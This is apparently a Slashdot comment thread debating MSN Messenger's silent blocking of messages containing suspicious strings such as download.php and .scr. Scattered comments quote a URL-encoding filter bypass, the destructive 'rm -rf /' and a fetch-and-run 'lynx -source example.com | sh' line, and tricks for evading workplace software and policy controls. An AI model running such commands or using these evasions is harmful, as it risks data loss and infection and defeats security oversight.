MSN Censors Your IM

Jamie ran across a story about censorship on MSN. Essentially, a number of suspicious strings result in silent failure of delivery. The strings are unsurprisingly things like .scr and .info. They've started maintaining a list if you're interested. Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

The genius that is Microsoft...

[KingSkippus]

From an article that is linked to from this one:

The link filter does not take canonical URLs into account: http: //evil.example.com/download.php and http: //evil.example.com/down%6Coad.php is the same URL, expressed in two different ways. The first one is blocked, while the second one is not.

Or for that matter, http: //tinyurl.com/z35a5.

Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm.

It's also probably worth noting that the messages are blocked on the server, not the client. That means that it will block the message whether you're using the MSN client, Pidgin, or any other client to access MSN.

My advice: Get a frickin' Google mail account already and use Google Talk instead.

Re:The genius that is Microsoft...

[lattyware]

Or just any Jabber client, for that matter.

Re:The genius that is Microsoft...

[ChowRiit]

People always miss the point in these arguments, and say "get such and such instead" - it doesn't help, because my friends use MSN, and probably the same for most tech savvy MSN users. Sure, I'd rather use a better protocol, but I'm stuck using what my friends are on. This is the problem with "picking" an IM - the decision isn't made by you, but by the people you want to talk to who already have picked one.

Re:The genius that is Microsoft...

[rikkus-x]

"Either get other friends, or convert the ones you have"

Says the person with a binary signature.

Re:The genius that is Microsoft...

[Wordsmith]

The day I start picking my friends based on their responses to IM security issues will be a sad, sad day.

"Mom, I met a great girl. She's not very nice, and she's not very pretty, but she started using Jabber after the latest MSN fiasco. You'll love her. I'll have her message you; oh, but you'll have to switch of of AIM first, mom."

Re:The genius that is Microsoft...

[Alchemar]

I had the same problem.... I picked better friends.

Anyone that I have any relation with knows that I will not contact them via MSN, AIM, My Space, Live Journal or any of their like. If they wish to communicate they can call me on the phone or send an email. If they push the point, I suggest that they learn to use IRC or obtain a HAM radio license with a morse code rating, and I will gladly send them an instant message. Most have selected the telephone as their main choise, but one now holds a General class license. I view them pushing their "favorite" method onto me insulting and expect them to feel the same. If they do not find a medium that is commonly available and required for business communications as aceptable, then I really don't want to be associated with them.

-gasp- Slashdot, too!

[Aladrin]

"Nothing for you to see here. Please move along."

I'm guessing they're using that as a way to make sure only subscribers can get first post now? It wouldn't load for me until someone had posted.

As for the IM... I don't care what it is, it's not their job to censor it. Virus check attachments, sure... But not sensor the chat. Absolutely ridiculous. Reminds me of games that try to filter out all 'bad' words and end up filtering out words like 'fanny' because they mean 'butt' in the US and apparently refer to women's genitalia in the UK. How people NAMED Fanny deal with that, I can't imagine. There were quite a few more commonplace words that mean odd things in other languages or countries and were filtered as well. Ridiculous.

Re:-gasp- Slashdot, too!

[KingSkippus]

Reminds me of games that try to filter out all 'bad' words

I play City of Heroes, and for some weird reason, it blocks the word "count." I think it was a typo when someone was entering words to block into the filter. It was just kind of funny, because I discovered it when I told someone, "Don't worry, you can count on me!" and it came out as "Don't worry, you can <bleep!> on me!" They had no idea what I was talking about, and it took a few entertaining minutes to hash out what was going on.

Re:-gasp- Slashdot, too!

[gbjbaanb]

Ah, the northern Uk town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

Re:-gasp- Slashdot, too!

[janrinok]

WHOOSH......

Re:-gasp- Slashdot, too!

[Reaperducer]

The problem, though is that after the brouhaha, people started deliberately using the "innocent" word in mean-spirited ways. I mean, come on, before all of this mess, no one ever used the word niggardly in normal conversation.

Not necessarily. It depends on who's in your circle of friends. YOUR circle of friends may not use that word, but that doesn't mean that "no one" ever used it, especially in formal writing or speeches.

During the controversy, one of the newspapers (Boston, I think) ran through one of the loudest critics prior speeches and found that he'd used it in the past, as well.

Just because SOME people are that special combination of both ignorant and loud, it shouldn't change the way educated people communicate.

Re:-gasp- Slashdot, too!

[glitch23]

Ah, the northern Uk town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

No, it's "Thor". We don't like Scandinavians.

Blocked firefox.exe

[nurb432]

And simply renaming worked? Your IT department is pretty inept.

Re:Blocked firefox.exe

[lattyware]

An inept IT department?
OMFG!
Someone alert the world press!

Re:Blocked firefox.exe

[KingSkippus]

No, they specifically blocked firefox.exe. It wasn't part of a regular expression or policy to keep people from running their own programs. They made a deliberate and conscious choice to not only standardize on Internet Explorer as the Official Company Browser(TM), but to try to prevent anything else from even working.

It's not the only time they've done something lame-ass like that. For example, they've also created an Active Directory policy to push down the corporate intranet page as your home page. So if you're like me and prefer something like Google as your home page, too damn bad, it resets it next time you log in. I had to go in and deny permission to that registry key for Administrators to keep that from happening. (Yes, I know, they can reset the permissions on the key if they figure out what I've done, but they're not that motivated, and the point was to keep the automatic update from happening, which this does successfully.)

Re:Blocked firefox.exe

[nurb432]

Pushing down the default page via GPO sonuds pretty responsible to me. It helps prevent users default pages getting hijacked with porn sites, among other things.

Part of It's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then thats too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.

Re:Blocked firefox.exe

[nurb432]

User installed softare that isnt part of hte official internal standard increases support costs, among other issues. So unless there is a business need, i dont see a problem with it being blocked. ( tho, simply blocking an executable name isnt the right way to do it, but that is a different discussion )

Now, if you come up with a valid business need for said non standard software, and its ignored, then we are in agreement.

Re:Blocked firefox.exe

[KingSkippus]

If that happens to step on your personal wants, then thats too bad.

What if it steps on what I need to do my job? I'm glad I don't work for you. You seem to be one of those types that thinks that just because something can be done, it needs to be done. Pushing down the default page doesn't protect the corporate computing assets, though I'm sure that's how our desktop goobers pitched it to management. It's just one more way to control things they have no business controlling, and it impacts our productivity.

They also do thinks like push down custom Start Menu structures. Microsoft Word, for example, isn't under All Programs or even Microsoft Office like it is on every other computer. No, it's buried under "Office Applications" (not to be confused with "Business Applications," a separate directory), along with things like Adobe Acrobat and such. They've also moved Windows Explorer (the filesystem explorer, not Internet Explorer) under Accessories. If I change this to something I'm more used to, it gets reverted next time I log in. Obviously, they've also deleted and blocked Solitaire and Minesweeper from running; it wouldn't do for people to take a break from hammering their stones. The company logo is pushed out to be everyone's desktop background.

My favorite, though, is that they've decided that everyone needs a little application called Kontiki. It's a peer-to-peer video distrubtion software system that turns all of our PCs into filesharing peers for corporate videos. You can't disable it and you can't delete the videos that it pushes down. (If you try to deleting a video, the software automatically re-downloads it from--you guessed it--your coworkers computers.) I detest days when corporate videos go out. My bandwidth is sucked dry by something I neither want nor use and have no control over.

Let's see... Need more stories? How about this. They recently pushed out a piece of software called Connected Backup. What happened is that our fileservers where people's home directories were started filling up. Instead of going out and buying more hard drives or implementing quotas, they've rolled out this backup software to everyone's computer that automatically backs up your machine once a day whether you want it to or not. Now, they're telling everyone that official company policy is to NOT store important documents on the fileservers, but to store them on your local PCs. Brilliant! Of course, network traffic has shot up dramatically, and the backup servers had to have a TON of storage added to them (the data still has to go somewhere), and instead of only things that people save on the fileservers being backed up, all of their personal shit is, too.

Every day, my computer runs a Connected backup, a virus scan, a vulnerability scan, a document retention scan, a software installation scan, Notes database replication, and my Run key in the registry has around 50 entries in it that our desktop group has loaded in, and it takes around two minutes for all of the group policies and login scripts to run when I log in. Thanks to our desktop group, literally 30 minutes of my day is wasted waiting for all of that shit to run.

I could go on with the stupidity if you really want me to. You're right about one thing; they've definitely protected the corporate computing assets. People hate using their computers so much now that a lot of people I know have gone back to just leaving it on all the time for doing their timesheets, and conduct their normal business using such old school methods such as the telephone and pencil and paper. As for me, I actually do some of my work at home using my own computing resources, and the only reason I can tolerate using my work computer for anything is because I know how to get around most of the shit they try to push down on us.

Re:Blocked firefox.exe

[nurb432]

Thats not a business case. Thats just a lame excuse.

And in a well run shop, even if you got permission to run it, the IT department would have to install it for you. You wouldn't be downloading it yourself.

Once you grow up and have to support 40000 users, you might understand that things are different in the business world then they are at home.

Re:Blocked firefox.exe

[Lehk228]

with two clicks you could evacuate the building? sweet next time a co-irker leaves his/her machine unlocked while they use the bathroom have a bit of fun

Re:Blocked firefox.exe

[innocent_white_lamb]

and really, the "support costs" of a freaking browser are zero anyway
 
"Hello, helpdesk? Website X isn't working. What? It's working for you? Then there is something wrong with this computer. I want to file a help ticket now."
 
We're probably up over twenty dollars already and haven't even sent someone out to look at this guy's computer yet.

Re:Blocked firefox.exe

[innocent_white_lamb]

I have never, ever known someone to call helpdesk over a website not working
 
explains
 
  Hell, for that matter I've yet to work for a company with a helpdesk.
 
As it's impossible to call a non-existent helpdesk.
 
So your opinion is, therefore,
 
  Bullshit
 
as you are unqualified to express one in this situation.
 
Sorry, no cigar this time. Nice try, though.

Re:Blocked firefox.exe

[KingSkippus]

Odds are we know better than you...

Maybe, but I kind of doubt it. I was a NT server support person for a couple of years, then a systems admin (and a damned good one, if I do say so myself) for almost a decade. I've fought my fair share of battles, and my background is precisely why I know how to get around most of the shit they keep trying to push down to my workstation.

Some higher up executive, though, decided to bring it up... (blah blah blah)

Did you try to fight it? Did you tell your manager, "This is a bad idea, and here's why..."? Like I've said, I've fought my fair share of battles. I haven't won them all. I had to delete Solitaire and Minesweeper at a smaller company I worked at because, as my boss said, "I hate those stupid timewasters." However, when he had a meeting to tell us that he read that you could lock down the desktop background image, I explained to him why that was a bad idea, and actually won that battle.

At my last job before the one I have now, I was the manager of server operations. I hate to say it, but my boss was a complete idiot who didn't know a thing about managing an IT department. It was ridiculous, and on more than one occasion, I found myself in the CFO's office (his boss) explaining why what my boss had told him was a load of hooey. I ended up quitting because I literally was afraid that I would be prosecuted at some point for something my boss would make me do and pinned on me as a scapegoat, and a few months later, he was finally fired because he screwed up a license scheme and it cost the company over $100 thousand (a LOT of money for that company). While I was there, I actually deliberately disobeyed him on many occasions when he asked me to do things that were illegal and/or unethical.

But the desktop goobers where I am now? They don't just implement management's decisions. Believe me, I've talked to them on many occasions, and they actually defend what they've done. I know for a fact that they are the ones who are instigating a lot of this crap, because in my company, it's how you get ahead; you lead a project that costs hundreds of thousands of dollars and put together reports about how well it went. What? There isn't a project involving spending hundreds of thousands of dollars? Then you make one up.

So yeah, I guess I am one of those users. As a matter of fact, I do know more than most of our IT folks about how these systems work. And if they stand in the way of me doing my job, I'll go around them without an iota of guilt because frankly, what I'm doing is much more important then them locking down my home page and desktop background.

Re:Blocked firefox.exe

[rohrb123]

I understand where you're coming from and won't attempt to defend your IT department's actions - completely. Poorly designed network, server, and backup schemes like that are inexcusable. It's quite obvious they're making problems worse instead of fixing them, and creating new ones. It's very simple to have computers turn on with WOL, run a virus scan at night, and turn back off with remote shutdown, and totally unnecessary for any background scans to be running during the day. And lack of storage space is probably the lamest excuse any IT department can come up with these days, with 1TB SATA drives under $400. We maintain 225GB of shared storage PER USER, and the costs were rather small, even for fibre channel.

However, I've found IT is sometimes used to take care of problems that are really the domain of management or HR, and in this case you generally have to focus on the lowest common denominator. Say you have an employee who's really, really good at what he does, and has gone above and beyond tasked duties a number of times for the company. His skill set alone makes him difficult to replace, especially at what he's currently being paid. However, he has the bad habit of coming in at 6AM and downloading porn on company computers, because he has a wife and kids at home. How did we find out? the startup page being changed to a porn site, as well as several minor adware installations. "Um I don't know how this happened!!" This was when we instituted several new technology policies, including a content-filter as well as a GPO-set home page. Fortunately our startup page only contains links to the most-used work related sites, and google. But it still pissed off people who wanted to catch the news headlines every time they opened their browser.

I've had similar issues with webmail, screensavers, backgrounds, partypoker, ebay, solitaire and similar programs, the list goes on. It's sad that many people can't get it through their heads that when they're at work they're being paid to work, not work when it's convenient for them. It's also sad that these problems have to be solved via technology instead of management addressing them directly. I've found that to be the origin of many IT "control" policies in my brief experience, and they only tend to make problems worse. You have a secretary in a cubicle who spends half an hour a day (paid) on myspace, and instead of her receiving some sort of formal reprimand, you're instructed to block myspace at the proxy server. She then wastes an hour per day - half of it trying to get around the filter with various proxies, the other half taking care of her social business. Management's response? "well, we'll lose more productivity firing her and training someone else than keeping her on", like there's no middle ground.

To me it seems like your company is attempting a piss-poor attempt at increasing productivity by decreasing the opportunities for distraction. They're probably the type who think their way of doing things is the most efficient and forcing that upon everyone else is a good thing (such as those custom folders brought up). I've been on the other side of that coin when an employee was having issues with yahoo directions, when we had a copy of mappoint 2k7 as well as google earth on their computer. It's tricky business, and sometimes it's difficult to foresee when you might step on a user's toes, especially the rare advanced user.

As for the rest of the stuff your IT department does, such as video sharing, well, erm, see article on using linux at work?

I already knew some

[alx5000]

Since the day I became almost crazy when I was trying to pass a URL which included 'download.php?' to a friend from a well trusted website. All of my messages sent back to me. PITA.

Fortunately, it's kinda easily fooled if you randomly place a space and add "delete the space" at the end of the sentence. If they trust me in the first place, what prevents them from copy-pasting it and deleting a character as I requested?

Misleading headline

[noidentity]

This isn't censorship; it's just a poor firewall. The difference is that the former is for stifling human communication, while the latter is to protect machines from malicious software.

Re:Misleading headline

[jamie]

No, the data which is being blocked from transmission is not blocked because it's going to a computer program which would be exploited by it. At least I haven't seen any allegations of that. It's being blocked because the human that would receive the data might use it in a way deemed inappropriate (by clicking on it, say).

Re:Misleading headline

[jez9999]

Are you the guy that Slashdot hired to start correcting all the inaccurate stories and comments posted here?

Priorities and mitigation

[Fastolfe]

Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects? If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time? There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.

This also assumes that the same organization even owns the bug in question. Not all of these defects may be Microsoft's problem to begin with. This might even be a MORE reasonable action for them to take, since they're doing "everything in their power" to fight the problem rather than just sitting on their hands waiting for a 3rd-party to correct their bug, and sitting on their hands longer waiting for the end user to update their software.

Re:Priorities and mitigation

[RAMMS+EIN]

``Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM?''

Yes.

``Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects?''

That sounds almost reasonable. Except that it implies that Microsoft actually makes a serious effort to fix the security holes they've saddled their users with. I had some hopes that, with Vista, they had actually started down that road, but these hopes have since been thoroughly dashed. Microsoft aren't and have never been serious about the security of their users.

This is not part amond "multiple efforts to correct probems AND mitigate their effects", this is a lame cop-out.

``If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time?''

Yes, but that's not what's happening. What's happening is that Microsoft is censoring their IM service. I believe this is in a sincere effort to slow the spreading of malware over MSN, but that doesn't mean it's a Good Thing. For one thing, it also degrades the usabiltiy of the service for legitimate purposes. For another, it doesn't _actually_ stop the malware. What it does is erect some barrier. In that sense, it's not very different from the bazzilions of "Are you sure?" dialogs that Microsoft software is full of. Except that these dialogs _could_ actually help educate users, if said users would bother to read and learn. Blocking certain messages just annoys legitimate users of the service. The filter will be bypassed. After that, everything is as it was, except less usable. And in the meantime, Microsoft introduces new security holes and lets other holes linger.

Oh, and did you realize that this censoring (which really has been going on for months if not years now) can also be used as a stepping stone to censoring things that Microsoft considers harmful, even if the users would likely find them bona-fide? I've already had several of my messages blocked by the filters, and I assure you they did not in any way relate to malware. Perhaps a few cases of open-source software, though.

``There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.''

Sure. And I do believe this is a sincere effort to protect MSN users. I just think the cure is worse than the disease.

.INFO

[tverbeek]

I don't suppose it's occurred to Microsoft that .info is a perfectly valid TLD used by a significant number of legitimate web sites, and a perfectly appropriate string to include in an IM discussion.

.com

Do they block those scary executable .com files too?

MSN does some weiiiiiird things...

[jez9999]

Here's one it started doing since the recent MS security drive. Any file that could possibly exploit a hole in any piece of software seems to be treated with serious suspicion. Somehow, this seems to include GIF files. So, when someone tried to send me a GIF file, I get this warning. I download it anyway, and it's sitting on my hard drive. I can copy it somewhere else, open it, etc.

However - and this is the kicker - when I click on the blue link to the file in the MSN chat window, I get this dialog. Yeah, it actually DELETED the file I just downloaded. After I copied it using Explorer. And I have full access to it. Dunno who implemented that piece of genius.

Re:MSN does some weiiiiiird things...

[tepples]

That Microsoft crackden 'feature' is one big pain in the ass! Damn. The hassle Ive had with that fucking policy. How do you turn it off? One way is to install Ubuntu, but it's not for everyone.

Re:MSN does some weiiiiiird things...

[gardyloo]

Yep, that's astoundingly annoying. IIRC, you can do a "Save To..." instead of allowing MSN to choose where to save it. Then it doesn't get deleted.

And if they didnt

[nurb432]

The first person that got infected wiht something would bitch that Microsoft didn't do enough.

Not that im fond of them either, but it seems they cant win either way these days.

At least they're doing something

[Deathlizard]

Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place

At least their trying something (albeit a weak approach) to stop automated scripts from sending viruses all over their chat protocol.

When you work on 1000+ college student laptops, you learn a lot of things about software students use in general, and one of these things you learn is:

1) AIM is a Virus downloading service disguised as a chat protocol.

I know that AOL doesn't do this on purpose, but it is so easy to hack that it might as well be. it's great when a 12 year old downloads a virus that infects Aim thinking it was some game (probably from AIM i might add), it sends "Hey check this out!" to his sister at the college containing an infected link or program, and the next thing you know you're running Aimfix and cleaning Zlob off on 300 PC's.

If Aim would simply filter out the bad traffic (and they should be able to know if a client is spamming the servers like crazy by heuristics alone) it would stop a lot of scams dead in their tracks.

Old news!

[Stormx2]

This has been known about for years. Here's a digg posting from over a year ago...

All the more reason to use Jabber/XMPP

[MysticOne]

You can set up your own server, you can control your own IM stuffs, and really ... it's just a better solution. You could still go with GTalk if you want access to the Jabber network without setting up a server or doing anything fancy, but in that case I'd recommend encryption for your conversations (you should probably do that anyway). If you just want to set up a new Jabber account on one of the public servers, head on over to jabber.org and pick one out.

Four ways to hide the .php extension

[tepples]

And what does every Linux web server come with?

Perl.

Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation:

• With Options MultiViews, the client requests /download?foo=bar. Apache HTTP Server will look for a file called download, not find it, and then search for download.* and run the first thing it finds.
• Type-mapped negotiation in Apache works much the same way, except it uses .var files (similar to Windows shortcuts) that point to your script. For instance, /download?foo=bar would reference /download.var, which points to /download.php. It's useful if you have a lot of small requests, for which the repeated directory scans performed by MultiViews might become CPU-bound.
• Rename download.php to download/index.php, and Apache will find it when it scans index.* to display a default page for a directory.
• Last but not least, mod_rewrite.

Re:Four ways to hide the .php extension

[Zonk+(troll)]

Or, do it the way I do.

1. Name the PHP file "download".
2. Use this option either in httpd.conf or .htaccess:

<Files /path/to/file/download>
SetHandler application/x-httpd-php
</Files>

3. Access it like:
http://localhost/download or accept arguments like http://localhost/download/file.odt

If you want to get what comes after the slash, this is all you need:

$thePath = explode("/",ereg_replace($_SERVER['SCRIPT_NAME']," ",$_SERVER['REQUEST_URI']));


file.odt would be located in $thePath[1].

Re:Four ways to hide the .php extension

[Zonk+(troll)]

$thePath = explode("/",ereg_replace($_SERVER['SCRIPT_NAME']," ",$_SERVER['REQUEST_URI'])); There isn't supposed to be a space in the quotes. The lameness filter added that.

Re:Four ways to hide the .php extension

[Dragonslicer]

Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation: Another option is to use the AddType directive to have other file extensions run through the PHP interpreter. If you don't have any static pages on your site or can accept the minor performance hit, you can send all .html files through PHP.

Oh please.

[arcade]

Anyone who knows me knows that I haven't used windows since 1999. I simply can't stand the system, nor can I stand the corporation behind it.

However. I'm also interested in computer security.

It _MAKES SENSE_ to block stuff that has been observed in automated worms. It's a simple solution. It's not something that will make all systems invulnerable - but it _MAKES SENSE_. It's a quickfix. A quickfix that works.

This is only "censorship" insofar that it actually prevents stupid automated worms to spread. It's a defensie measure. Not a perfect one, but one.

Oh, and patching the holes. Sure. You can patch the holes. Then everyone has to update .. should we try to protect, or should we ignore those that do not upgrade their systems? The cynic in me tells me : "Let them be cracked". The humanitarian in my tells me: "Well, think of the victims of the DDOS attacks from the botnets of previously-vulnerable people".

I'm dead tired of _idiots_ who thinks that any preventative measure is evil! censorship! bad!

Microsoft is simply trying to help in this case. If you do not like it, use another IM service. Like Yahoo! .. or IRC for that matter. Heck. PLEASE go back to IRC. It's still the best means of communication there is.

So, please you censorship-screaming morons:

SHUT UP! STOP USING THEIR SERVICE IF YOU DO NOT LIKE IT. THEY ARE TRYING TO DO THE RIGHT THING IN THIS INSTANCE !

*phew*. Now I have to go wash my brain. I've just defended satan.

Re:Oh please.

[Tama00]

i dont know why this is flagged as flame bait, this guy is correct.

Microsoft censored the words to stop those stupid worms going over everyones msn account, you know those stupid viruses that say, "i found a pic of you at www.somewhere.com/download.php?name=virus" and then some silly teenage girl would go, OMG REALLY and click on it, now she has the virus and its telling all her contacts the name thing.

So how do they put a stop to this, just censor the bloody url so the message wont send.

Some of you guys on slashdot just have got to realise that MOST PEOPLE WHO USES COMPUTERS ARE _NOT_ AS SMART AS YOU! Some wont update there programs, others wont know how to remove the virus and even more will click on stupid links like that.

Fix what?

[defile]

Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

Someone want to tell me how you fix a user who downloads and runs untrusted executable code?

I've seen plenty of Linux n00bs get tricked into running rm -rf /. Or lynx -source example.com | sh

MSN implementing filters on certain strings is just a small measure in a huge arms race any major IM system has to deal with.

PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS.

Vulnerabilities

[TopSpin]

I'd rather they fix the vulnerabilities How would you detect the idiocy level of the recipient? If you spam a thousand accounts with "OMG check this http://somedomain/hot-teen-s3x.scr" you just know some fraction of the audience will dutifully follow the link and then dismiss every prompt that appears trying to prevent installation.

Worse, after they get their own machine hacked, they'll blame MSN. They'll contact whatever 'customer service' facility is provided and scream bloody murder. If they manage to get fired as a result they may even sue. Don't doubt that there are employers capable of getting litigious with MSN over it, also.

Sadly, this is the reality of operating an IM/Email/SMS service today. Look carefully at that graphic realize that it is not an exaggeration.

The Solution!

[causality]

The solution?

Apply some idea of "common carrier" status to MSN. Like the telephone companies, as long as they do not attempt to edit or censor the content that passes through their networks, in any way, then they are not responsible and cannot be held liable for any damage caused by such content. But the moment they start taking measures like this to try to "sanitize" the content of the network, make them legally liable to pay damages for any successful attack/exploit that they are unable to prevent.

Overnight, this stupidity would go away. It would also set a great precedent for any other companies that wish to do this.

Re:Anybody else notice its .php files that get ...

[Lillesvin]

Also the php files are in the document_root directory (or whatever you want to call it).

Yeah, on the server - then they could exploit the server hosting them... Why on earth would MS care about that? They're doing the filtering to protect the end-users from exploits of vulnerabilities in the MSN client. It doesn't matter the least bit if it's PHP, Perl, Ruby, ASP or whatever that runs on the server-side - it's what is returned from the server-side that matters. I'll have to agree with the guy guessing that PHP is usually the first choice of scripting language for script kiddies.

And as the first poster noted, TinyURLs get through just fine, plus it'd be the least of problems to make a HTTP redirect, so http://example.com/harmless.script points to http://example.com/malicious.script?that=pwns&MSN= users. This way of "fixing" bugs is nothing but retarded - it fixes nothing and it hassles end-users a great deal - some of those substrings that are getting blocked are VERY common.

Full list

[marcansoft]

kakaroto from the amsn project somehow obtained the full censored regexp list. There are about 90 in total.

http://www.amsn-project.net/forums/viewtopic.php?t =157&postdays=0&postorder=asc&start=30

They ought to censor....

[madbawa]

....msmsgs.exe